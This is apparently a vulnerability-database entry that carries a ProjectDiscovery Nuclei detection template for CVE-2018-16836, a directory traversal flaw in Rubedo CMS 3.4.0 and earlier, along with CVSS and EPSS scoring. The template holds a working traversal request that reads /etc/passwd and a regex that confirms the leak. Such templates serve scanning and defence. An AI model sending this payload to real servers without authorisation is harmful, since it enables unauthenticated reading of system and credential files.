Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-16836
HistoryJun 10, 2021 - 10:08 a.m.

Rubedo CMS <=3.4.0 - Directory Traversal

2021-06-1010:08:37
ProjectDiscovery
github.com
7
cve-2018-16836
rubedo cms
directory traversal
local file inclusion
exploit-db
rubedo_project

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.235

Percentile

96.6%

Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/…//etc/passwd URI.

id: CVE-2018-16836

info:
  name: Rubedo CMS <=3.4.0 - Directory Traversal
  author: 0x_Akoko
  severity: critical
  description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server.
  remediation: |
    Upgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch.
  reference:
    - https://www.exploit-db.com/exploits/45385
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16836
    - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms
    - https://www.exploit-db.com/exploits/45385/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16836
    cwe-id: CWE-22
    epss-score: 0.26631
    epss-percentile: 0.96743
    cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubedo_project
    product: rubedo
  tags: cve2018,cve,rubedo,lfi,edb,rubedo_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201c2df0229ff7748acdd22d008c7f88c515a2b5fe7b93f0be7ff4faeaa59e37ca02210082b5dd9724a4b7d1b568fb6c433bcebd074fd44c03fc25152b56981c927cf3a8:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.235

Percentile

96.6%